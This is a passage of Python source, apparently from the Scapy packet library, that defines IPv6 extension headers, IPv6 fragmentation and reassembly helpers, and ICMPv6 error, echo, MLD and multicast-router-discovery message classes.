        """Build the options of ``x``.

        When the 'autopad' value of ``pkt`` is on (the default when it
        cannot be read), padding options are inserted so that every
        option meets its alignment requirement and so that the position
        reached after the last option is a multiple of 8.
        """
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            return b"".join(map(bytes, x))

        def padding(gap):
            # A single byte can only be filled with Pad1; PadN already
            # takes 2 bytes for its type and length.
            if gap == 0:
                return b""
            if gap == 1:
                return raw(Pad1())
            return raw(PadN(optdata=b'\x00' * (gap - 2)))

        position = self.curpos
        pieces = []
        for option in x:
            gap = option.alignment_delta(position)
            pieces.append(padding(gap))
            encoded = raw(option)
            pieces.append(encoded)
            position += gap + len(encoded)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        pieces.append(padding((-position) % 8))
        return b"".join(pieces)

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val)

930 

931 

class _PhantomAutoPadField(ByteField):
    """Field that is never present on the wire.

    Building adds nothing, dissecting consumes nothing and always yields
    the value 1.
    """

    def addfield(self, pkt, s, val):
        # Nothing is written for this field
        return s

    def getfield(self, pkt, s):
        # Nothing is read; the value is always 1
        return s, 1

    def i2repr(self, pkt, x):
        return "On" if x else "Off"

943 

944 

class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    """Hop-by-Hop Options extension header.

    ``len`` counts 8-byte units beyond the first 8 bytes of the header;
    the options take the whole header except its first 2 bytes.
    """
    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # x is the options length: add the 2 leading bytes, round up to a
        # multiple of 8 and do not count the first 8-byte unit
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 9) // 8 - 1),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: 8 * pkt.len + 6),
    ]
    overload_fields = {IPv6: {"nh": 0}}

954 

955 

956# Destination Option Header # 

957 

class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    """Destination Options extension header.

    ``len`` counts 8-byte units beyond the first 8 bytes of the header;
    the options take the whole header except its first 2 bytes.
    """
    name = "IPv6 Extension Header - Destination Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # x is the options length: add the 2 leading bytes, round up to a
        # multiple of 8 and do not count the first 8-byte unit
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 9) // 8 - 1),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: 8 * pkt.len + 6),
    ]
    overload_fields = {IPv6: {"nh": 60}}

967 

968 

969# Routing Header # 

970 

class IPv6ExtHdrRouting(_IPv6ExtHdr):
    """Routing extension header carrying a list of IPv6 addresses.

    ``len`` is expressed in 8-byte blocks (2 per address). ``segleft``
    defaults to None and is then set to the number of addresses when the
    packet is built.
    """
    name = "IPv6 Option Header Routing"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        FieldLenField("len", None, count_of="addresses", fmt="B",
                      adjust=lambda pkt, x: 2 * x),  # in 8 bytes blocks
        ByteField("type", 0),
        ByteField("segleft", None),
        BitField("reserved", 0, 32),  # There is meaning in this field ...
        IP6ListField("addresses", [],
                     length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        if self.segleft is None:
            # segleft is the 4th byte of the header
            segleft = struct.pack("B", len(self.addresses))
            pkt = pkt[:3] + segleft + pkt[4:]
        return _IPv6ExtHdr.post_build(self, pkt, pay)

987 

988 

989# Segment Routing Header # 

990 

991# This implementation is based on RFC8754, but some older snippets come from: 

992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 

993 

994_segment_routing_header_tlvs = { 

995 # RFC 8754 sect 8.2 

996 0: "Pad1 TLV", 

997 1: "Ingress Node TLV", # draft 06 

998 2: "Egress Node TLV", # draft 06 

999 4: "PadN TLV", 

1000 5: "HMAC TLV", 

1001} 

1002 

1003 

class IPv6ExtHdrSegmentRoutingTLV(Packet):
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    # RFC 8754 sect 2.1
    fields_desc = [
        ByteEnumField("type", None, _segment_routing_header_tlvs),
        ByteField("len", 0),
        StrLenField("value", "", length_from=lambda pkt: pkt.len),
    ]

    # Maps the default "type" value of each TLV class to that class.
    registered_sr_tlv = {}

    def extract_padding(self, p):
        # A TLV carries no payload: all remaining bytes are handed back.
        return b"", p

    @classmethod
    def register_variant(cls):
        # Record this class under the default value of its "type" field.
        cls.registered_sr_tlv[cls.type.default] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        # Select the registered TLV class from the first byte of the data,
        # falling back to the class the hook was called on.
        if not pkt:
            return cls
        return cls.registered_sr_tlv.get(ord(pkt[:1]), cls)

1026 

1027 

class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.1
    fields_desc = [
        ByteEnumField("type", 1, _segment_routing_header_tlvs),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("ingress_node", "::1"),
    ]

1036 

1037 

class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
    # draft-ietf-6man-segment-routing-header-06 3.1.2
    fields_desc = [
        ByteEnumField("type", 2, _segment_routing_header_tlvs),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("egress_node", "::1"),
    ]

1046 

1047 

class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
    # RFC8754 sect 2.1.1.1, Pad1 is a single byte
    fields_desc = [
        ByteEnumField("type", 0, _segment_routing_header_tlvs),
    ]

1052 

1053 

class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - PadN TLV"
    # RFC8754 sect 2.1.1.2
    fields_desc = [
        ByteEnumField("type", 4, _segment_routing_header_tlvs),
        # One-byte length of the "padding" field that follows.
        FieldLenField("len", None, length_of="padding", fmt="B"),
        StrLenField(
            "padding", b"\x00",
            length_from=lambda pkt: pkt.len,
        ),
    ]

1060 

1061 

class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
    name = "IPv6 Option Header Segment Routing - HMAC TLV"
    # RFC8754 sect 2.1.2
    # "len" is derived from the length of "hmac" plus 48, and the "hmac"
    # field is dissected over (len - 48) bytes.
    # NOTE(review): unlike the other TLV "len" fields in this file, no
    # fmt="B" is given here, and the constant 48 is not explained by the
    # visible code (6 bytes sit between "len" and "hmac") - confirm the
    # intended width and offset against RFC 8754 before relying on them.
    fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
                   FieldLenField("len", None, length_of="hmac",
                                 adjust=lambda _, x: x + 48),
                   BitField("D", 0, 1),
                   BitField("reserved", 0, 15),
                   IntField("hmackeyid", 0),
                   StrLenField("hmac", "",
                               length_from=lambda pkt: pkt.len - 48)]

1073 

1074 

class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
    name = "IPv6 Option Header Segment Routing"
    # RFC8754 sect 2. + flag bits from draft 06
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteField("type", 4),
        ByteField("segleft", None),
        ByteField("lastentry", None),
        BitField("unused1", 0, 1),
        BitField("protected", 0, 1),
        BitField("oam", 0, 1),
        BitField("alert", 0, 1),
        BitField("hmac", 0, 1),
        BitField("unused2", 0, 3),
        ShortField("tag", 0),
        IP6ListField(
            "addresses", ["::1"],
            count_from=lambda pkt: (pkt.lastentry + 1),
        ),
        # TLVs fill whatever remains after the 16-byte addresses.
        PacketListField(
            "tlv_objects", [],
            IPv6ExtHdrSegmentRoutingTLV,
            length_from=lambda pkt: 8 * pkt.len - 16 * (pkt.lastentry + 1),
        ),
    ]

    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        # Fill in "len", "segleft" and "lastentry" when they were left unset.
        nb_addresses = len(self.addresses)

        if self.len is None:
            # The extension must be aligned on 8 bytes
            missing = -len(pkt) % 8
            if missing == 1:
                pkt += raw(IPv6ExtHdrSegmentRoutingTLVPad1())
            elif missing >= 2:
                # Add the padding extension (2 bytes of TLV header + zeros)
                zeros = b"\x00" * (missing - 2)
                pkt += raw(IPv6ExtHdrSegmentRoutingTLVPadN(padding=zeros))

            # Length in 8-octet units, not counting the first 8 octets
            hdr_len = (len(pkt) - 8) // 8
            pkt = pkt[:1] + struct.pack("B", hdr_len) + pkt[2:]

        if self.segleft is None:
            # Index of the last address, or 0 when there is none
            segleft = nb_addresses - 1 if nb_addresses else 0
            pkt = pkt[:3] + struct.pack("B", segleft) + pkt[4:]

        if self.lastentry is None:
            if nb_addresses:
                lastentry = nb_addresses - 1
            else:
                lastentry = 0
                warning(
                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
                )
            pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]

        return _IPv6ExtHdr.post_build(self, pkt, pay)

1135 

1136 

1137# Fragmentation Header # 

1138 

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        BitField("res1", 0, 8),
        BitField("offset", 0, 13),
        BitField("res2", 0, 2),
        BitField("m", 0, 1),
        IntField("id", None),
    ]
    overload_fields = {IPv6: {"nh": 44}}

    def guess_payload_class(self, p):
        # Fragments with a non-zero offset are kept as raw bytes; only the
        # first fragment goes through the regular payload guessing.
        if self.offset > 0:
            return Raw
        return super(IPv6ExtHdrFragment, self).guess_payload_class(p)

1154 

1155 

def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets.

    Only packets holding an IPv6ExtHdrFragment layer are considered, and
    among those only the ones sharing the fragment id of the first one
    (a warning is emitted when others are dropped). Fragments are reordered
    by increasing offset. Missing data is completed by 'X' characters.

    :param packets: iterable of packets, in any order
    :return: the reassembled packet, or an empty list when 'packets'
             contains no fragment
    """

    # Remove non fragments
    lst = [x for x in packets if IPv6ExtHdrFragment in x]
    if not lst:
        return []

    # Keep only the fragments that belong to the same datagram as the
    # first one.
    frag_id = lst[0][IPv6ExtHdrFragment].id

    llen = len(lst)
    lst = [x for x in lst if x[IPv6ExtHdrFragment].id == frag_id]
    if len(lst) != llen:
        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501

    # Reorder fragments by offset. The sort is stable, so fragments with
    # equal offsets keep their relative input order. (The former hand-made
    # selection loop never recorded the position of the minimum, which
    # left the list in its input order.)
    res = sorted(lst, key=lambda x: x[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    frag_hdr_len = 8
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset  # the offset field counts 8-octet units
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
        # When plen is set, use it to strip anything beyond the fragment
        # data; a None slice bound keeps the whole payload.
        frag_data_len = p[IPv6].plen
        if frag_data_len is not None:
            frag_data_len -= frag_hdr_len
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)[:frag_data_len]

    # Regenerate the unfragmentable part.
    q = res[0].copy()
    nh = q[IPv6ExtHdrFragment].nh
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)
    del q.plen

    # Re-dissect from bytes so the reassembled payload is parsed as layers.
    if q[IPv6].underlayer:
        q[IPv6] = IPv6(raw(q[IPv6]))
    else:
        q = IPv6(raw(q))
    return q

1215 

1216 

def fragment6(pkt, fragSize):
    """
    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
    expected maximum size of fragment data (MTU). The list of packets is
    returned.

    If packet does not contain an IPv6ExtHdrFragment class, it is added to
    first IPv6 layer found. If no IPv6 layer exists packet is returned in
    result list unmodified.

    An empty list is returned when the part starting at the fragment header
    is larger than 65535 bytes. When the built packet already fits in
    'fragSize', or when 'fragSize' is too low to carry any data, a
    single-element list is returned.
    """

    # Work on a copy so the caller's packet is left untouched.
    pkt = pkt.copy()

    if IPv6ExtHdrFragment not in pkt:
        if IPv6 not in pkt:
            return [pkt]

        # Insert a fragment header between the IPv6 layer and its payload.
        layer3 = pkt[IPv6]
        data = layer3.payload
        frag = IPv6ExtHdrFragment(nh=layer3.nh)

        layer3.remove_payload()
        # Drop explicit values so they get recomputed for the new layout.
        del layer3.nh
        del layer3.plen

        frag.add_payload(data)
        layer3.add_payload(frag)

    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
        return []

    s = raw(pkt)  # for instantiation to get upper layer checksum right

    # Nothing to do when the whole packet already fits.
    if len(s) <= fragSize:
        return [pkt]

    # Fragmentable part : fake IPv6 for Fragmentable part length computation
    fragPart = pkt[IPv6ExtHdrFragment].payload
    tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
    fragPartLen = len(tmp) - 40  # basic IPv6 header length
    # The fragmentable bytes are taken from the end of the built packet.
    fragPartStr = s[-fragPartLen:]

    # Grab Next Header for use in Fragment Header
    nh = pkt[IPv6ExtHdrFragment].nh

    # Keep fragment header
    fragHeader = pkt[IPv6ExtHdrFragment]
    del fragHeader.payload  # detach payload

    # Unfragmentable Part (everything before the 8-byte fragment header)
    unfragPartLen = len(s) - fragPartLen - 8
    unfragPart = pkt
    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload

    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets. last Frag MTU
    # can be anything below MTU
    lastFragSize = fragSize - unfragPartLen - 8
    innerFragSize = lastFragSize - (lastFragSize % 8)

    if lastFragSize <= 0 or innerFragSize == 0:
        warning("Provided fragment size value is too low. " +
                "Should be more than %d" % (unfragPartLen + 8))
        return [unfragPart / fragHeader / fragPart]

    remain = fragPartStr
    res = []
    fragOffset = 0  # offset, incremented during creation
    fragId = random.randint(0, 0xffffffff)  # random id ...
    if fragHeader.id is not None:  # ... except id provided by user
        fragId = fragHeader.id
    fragHeader.m = 1
    fragHeader.id = fragId
    fragHeader.nh = nh

    # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
    while True:
        if (len(remain) > lastFragSize):
            # Inner fragment: take a multiple of 8 bytes, "m" flag stays set
            tmp = remain[:innerFragSize]
            remain = remain[innerFragSize:]
            fragHeader.offset = fragOffset    # update offset
            fragOffset += (innerFragSize // 8)  # compute new one
            if IPv6 in unfragPart:
                # Let plen be recomputed for this fragment
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
            res.append(tempo)
        else:
            # Last fragment: carries what is left, "m" flag cleared
            fragHeader.offset = fragOffset    # update offSet
            fragHeader.m = 0
            if IPv6 in unfragPart:
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
            res.append(tempo)
            break
    return res

1315 

1316 

1317############################################################################# 

1318############################################################################# 

1319# ICMPv6* Classes # 

1320############################################################################# 

1321############################################################################# 

1322 

1323 

# ICMPv6 type value -> name of the class implementing that message.
icmp6typescls = {
    1: "ICMPv6DestUnreach",
    2: "ICMPv6PacketTooBig",
    3: "ICMPv6TimeExceeded",
    4: "ICMPv6ParamProblem",
    128: "ICMPv6EchoRequest",
    129: "ICMPv6EchoReply",
    130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
    131: "ICMPv6MLReport",
    132: "ICMPv6MLDone",
    133: "ICMPv6ND_RS",
    134: "ICMPv6ND_RA",
    135: "ICMPv6ND_NS",
    136: "ICMPv6ND_NA",
    137: "ICMPv6ND_Redirect",
    # 138: Do Me - RFC 2894 - Seems painful
    139: "ICMPv6NIQuery",
    140: "ICMPv6NIReply",
    141: "ICMPv6ND_INDSol",
    142: "ICMPv6ND_INDAdv",
    143: "ICMPv6MLReport2",
    144: "ICMPv6HAADRequest",
    145: "ICMPv6HAADReply",
    146: "ICMPv6MPSol",
    147: "ICMPv6MPAdv",
    # 148: Do Me - SEND related - RFC 3971
    # 149: Do Me - SEND related - RFC 3971
    151: "ICMPv6MRD_Advertisement",
    152: "ICMPv6MRD_Solicitation",
    153: "ICMPv6MRD_Termination",
    # 154: Do Me - FMIPv6 Messages - RFC 5568
    155: "ICMPv6RPL",  # RFC 6550
}

1356 

# ICMPv6 type value -> minimal header length, in bytes.
icmp6typesminhdrlen = {
    1: 8,
    2: 8,
    3: 8,
    4: 8,
    128: 8,
    129: 8,
    130: 24,
    131: 24,
    132: 24,
    133: 8,
    134: 16,
    135: 24,
    136: 24,
    137: 40,
    # 139:
    # 140
    141: 8,
    142: 8,
    143: 8,
    144: 8,
    145: 8,
    146: 8,
    147: 8,
    151: 8,
    152: 4,
    153: 4,
    155: 4,
}

1385 

# ICMPv6 type value -> human readable message name.
icmp6types = {
    1: "Destination unreachable",
    2: "Packet too big",
    3: "Time exceeded",
    4: "Parameter problem",
    100: "Private Experimentation",
    101: "Private Experimentation",
    128: "Echo Request",
    129: "Echo Reply",
    130: "MLD Query",
    131: "MLD Report",
    132: "MLD Done",
    133: "Router Solicitation",
    134: "Router Advertisement",
    135: "Neighbor Solicitation",
    136: "Neighbor Advertisement",
    137: "Redirect Message",
    138: "Router Renumbering",
    139: "ICMP Node Information Query",
    140: "ICMP Node Information Response",
    141: "Inverse Neighbor Discovery Solicitation Message",
    142: "Inverse Neighbor Discovery Advertisement Message",
    143: "MLD Report Version 2",
    144: "Home Agent Address Discovery Request Message",
    145: "Home Agent Address Discovery Reply Message",
    146: "Mobile Prefix Solicitation",
    147: "Mobile Prefix Advertisement",
    148: "Certification Path Solicitation",
    149: "Certification Path Advertisement",
    151: "Multicast Router Advertisement",
    152: "Multicast Router Solicitation",
    153: "Multicast Router Termination",
    155: "RPL Control Message",
    200: "Private Experimentation",
    201: "Private Experimentation",
}

1420 

1421 

class _ICMPv6(Packet):
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        # Append the payload, then fill bytes 2-3 with the checksum when
        # the "cksum" field was left unset.
        p += pay
        if self.cksum is None:
            computed = struct.pack("!H", in6_chksum(58, self.underlayer, p))
            p = p[:2] + computed + p[4:]
        return p

    def hashret(self):
        return self.payload.hashret()

    def answers(self, other):
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        # NOTE(review): "and" binds tighter than "or", so the _ICMPv6 check
        # on 'other' only applies to the _IPv6ExtHdr case - confirm this is
        # the intent.
        under = self.underlayer
        candidate = (
            isinstance(under, IPerror6) or
            (isinstance(under, _IPv6ExtHdr) and isinstance(other, _ICMPv6))
        )
        if not candidate:
            return 0
        # Type and code must both match.
        if self.type == other.type and self.code == other.code:
            return 1
        return 0

1446 

1447 

class _ICMPv6Error(_ICMPv6):
    name = "ICMPv6 errors dummy class"

    def guess_payload_class(self, p):
        # The payload of an ICMPv6 error is always dissected as IPerror6.
        return IPerror6

1453 

1454 

class ICMPv6Unknown(_ICMPv6):
    name = "Scapy6 ICMPv6 fallback class"
    # Common type/code/checksum header followed by an opaque body.
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        StrField("msgbody", ""),
    ]

1461 

1462 

1463# RFC 2460 # 

1464 

class ICMPv6DestUnreach(_ICMPv6Error):
    name = "ICMPv6 Destination Unreachable"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteEnumField(
            "code", 0,
            {
                0: "No route to destination",
                1: "Communication with destination administratively prohibited",  # noqa: E501
                2: "Beyond scope of source address",
                3: "Address unreachable",
                4: "Port unreachable",
            },
        ),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
        _ICMPExtensionPadField(),
        _ICMPExtensionField(),
    ]
    post_dissection = _ICMP_extpad_post_dissection

1479 

1480 

class ICMPv6PacketTooBig(_ICMPv6Error):
    name = "ICMPv6 Packet Too Big"
    fields_desc = [
        ByteEnumField("type", 2, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("mtu", 1280),
    ]

1487 

1488 

class ICMPv6TimeExceeded(_ICMPv6Error):
    name = "ICMPv6 Time Exceeded"
    fields_desc = [
        ByteEnumField("type", 3, icmp6types),
        ByteEnumField(
            "code", 0,
            {
                0: "hop limit exceeded in transit",
                1: "fragment reassembly time exceeded",
            },
        ),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
        _ICMPExtensionPadField(),
        _ICMPExtensionField(),
    ]
    post_dissection = _ICMP_extpad_post_dissection

1500 

1501 

1502# The default pointer value is set to the next header field of 

1503# the encapsulated IPv6 packet 

1504 

1505 

class ICMPv6ParamProblem(_ICMPv6Error):
    name = "ICMPv6 Parameter Problem"
    fields_desc = [
        ByteEnumField("type", 4, icmp6types),
        ByteEnumField(
            "code", 0,
            {
                0: "erroneous header field encountered",
                1: "unrecognized Next Header type encountered",
                2: "unrecognized IPv6 option encountered",
                3: "first fragment has incomplete header chain",
            },
        ),
        XShortField("cksum", None),
        # Offset, within the offending packet, of the faulty byte.
        IntField("ptr", 6),
    ]

1517 

1518 

class ICMPv6EchoRequest(_ICMPv6):
    name = "ICMPv6 Echo Request"
    fields_desc = [
        ByteEnumField("type", 128, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", 0),
        XShortField("seq", 0),
        StrField("data", ""),
    ]

    def mysummary(self):
        return self.sprintf("%name% (id: %id% seq: %seq%)")

    def hashret(self):
        # Requests and replies hash on their (id, seq) pair plus whatever
        # the payload contributes.
        ident = struct.pack("HH", self.id, self.seq)
        return ident + self.payload.hashret()

1533 

1534 

class ICMPv6EchoReply(ICMPv6EchoRequest):
    name = "ICMPv6 Echo Reply"
    type = 129

    def answers(self, other):
        # A reply answers an echo request carrying the same id, sequence
        # number and data.
        if not isinstance(other, ICMPv6EchoRequest):
            return False
        return (self.id == other.id and
                self.seq == other.seq and
                self.data == other.data)

1544 

1545 

1546# ICMPv6 Multicast Listener Discovery (RFC2710) # 

1547 

# All MLD messages are sent with a link-local source address
# -> take care of it in post_build if none is specified
# The Hop-Limit value must be 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
    # Layout shared by the MLD Query, Report and Done messages.
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 0),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
    ]

1562 

1563# general queries are sent to the link-scope all-nodes multicast 

1564# address ff02::1, with a multicast address field of 0 and a MRD of 

1565# [Query Response Interval] 

1566# Default value for mladdr is set to 0 for a General Query, and 

1567# overloaded by the user for a Multicast Address specific query 

1568# TODO : See what we can do to automatically include a Router Alert 

1569# Option in a Destination Option Header. 

1570 

1571 

class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    name = "MLD - Multicast Listener Query"
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    # Defaults applied to the enclosing IPv6 layer.
    overload_fields = {
        IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58},
    }

1578 

1579 

1580# TODO : See what we can do to automatically include a Router Alert 

1581# Option in a Destination Option Header. 

class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {
        IPv6: {"hlim": 1, "nh": 58},
    }

    def answers(self, query):
        """Check the query type"""
        is_query = ICMPv6MLQuery in query
        return is_query

1590 

1591# When a node ceases to listen to a multicast address on an interface, 

1592# it SHOULD send a single Done message to the link-scope all-routers 

1593# multicast address (FF02::2), carrying in its multicast address field 

1594# the address to which it is ceasing to listen 

1595# TODO : See what we can do to automatically include a Router Alert 

1596# Option in a Destination Option Header. 

1597 

1598 

class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    name = "MLD - Multicast Listener Done"
    type = 132
    # Done messages default to the all-routers address ff02::2.
    overload_fields = {
        IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58},
    }

1603 

1604 

1605# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # 

1606 

class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
    name = "MLDv2 - Multicast Listener Query"
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 10000),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
        BitField("Resv", 0, 4),
        BitField("S", 0, 1),
        BitField("QRV", 0, 3),
        ByteField("QQIC", 0),
        ShortField("sources_number", None),
        IP6ListField(
            "sources", [],
            count_from=lambda pkt: pkt.sources_number,
        ),
    ]

    # RFC 3810 - Message Formats
    overload_fields = {
        IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58},
    }

    def post_build(self, packet, payload):
        """Compute the 'sources_number' field when needed"""
        if self.sources_number is None:
            # The counter occupies bytes 26-27 of the built message.
            count = struct.pack("!H", len(self.sources))
            packet = packet[:26] + count + packet[28:]
        return _ICMPv6.post_build(self, packet, payload)

1632 

1633 

class ICMPv6MLDMultAddrRec(Packet):
    name = "ICMPv6 MLDv2 - Multicast Address Record"
    fields_desc = [
        ByteField("rtype", 4),
        FieldLenField(
            "auxdata_len", None,
            length_of="auxdata",
            fmt="B",
        ),
        # Number of sources: byte length of the list over 16 bytes each.
        FieldLenField(
            "sources_number", None,
            length_of="sources",
            adjust=lambda p, num: num // 16,
        ),
        IP6Field("dst", "::"),
        IP6ListField(
            "sources", [],
            length_from=lambda p: 16 * p.sources_number,
        ),
        StrLenField(
            "auxdata", "",
            length_from=lambda p: p.auxdata_len,
        ),
    ]

    def default_payload_class(self, packet):
        """Multicast Address Record followed by another one"""
        return type(self)

1652 

1653 

class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
    name = "MLDv2 - Multicast Listener Report"
    fields_desc = [
        ByteEnumField("type", 143, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
        ShortField("reserved", 0),
        ShortField("records_number", None),
        PacketListField(
            "records", [],
            ICMPv6MLDMultAddrRec,
            count_from=lambda p: p.records_number,
        ),
    ]

    # RFC 3810 - Message Formats
    overload_fields = {
        IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58},
    }

    def post_build(self, packet, payload):
        """Compute the 'records_number' field when needed"""
        if self.records_number is None:
            # The counter occupies bytes 6-7 of the built message.
            count = struct.pack("!H", len(self.records))
            packet = packet[:6] + count + packet[8:]
        return _ICMPv6.post_build(self, packet, payload)

    def answers(self, query):
        """Check the query type"""
        return isinstance(query, ICMPv6MLQuery2)

1678 

1679 

1680# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # 

1681 

1682# TODO: 

1683# - 04/09/06 troglocan : find a way to automatically add a router alert 

1684# option for all MRD packets. This could be done in a specific 

1685# way when IPv6 is the under layer with some specific keyword 

1686# like 'exthdr'. This would allow to keep compatibility with 

1687# providing IPv6 fields to be overloaded in fields_desc. 

1688# 

1689# At the moment, if user inserts an IPv6 Router alert option 

1690# none of the IPv6 default values of IPv6 layer will be set. 

1691 

class ICMPv6MRD_Advertisement(_ICMPv6):
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 151, icmp6types),
        ByteField("advinter", 20),
        XShortField("cksum", None),
        ShortField("queryint", 0),
        ShortField("robustness", 0),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"},
    }

    def extract_padding(self, s):
        # The first 8 bytes are kept as payload, the rest as padding.
        payload, padding = s[:8], s[8:]
        return payload, padding

1704 

1705 

class ICMPv6MRD_Solicitation(_ICMPv6):
    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 152, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"},
    }

    def extract_padding(self, s):
        # The first 4 bytes are kept as payload, the rest as padding.
        payload, padding = s[:4], s[4:]
        return payload, padding

1716 

1717 

class ICMPv6MRD_Termination(_ICMPv6):
    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [
        ByteEnumField("type", 153, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"},
    }

    def extract_padding(self, s):
        # The first 4 bytes are kept as payload, the rest as padding.
        payload, padding = s[:4], s[4:]
        return payload, padding

1728 

1729 

1730# ICMPv6 Neighbor Discovery (RFC 2461) # 

1731 

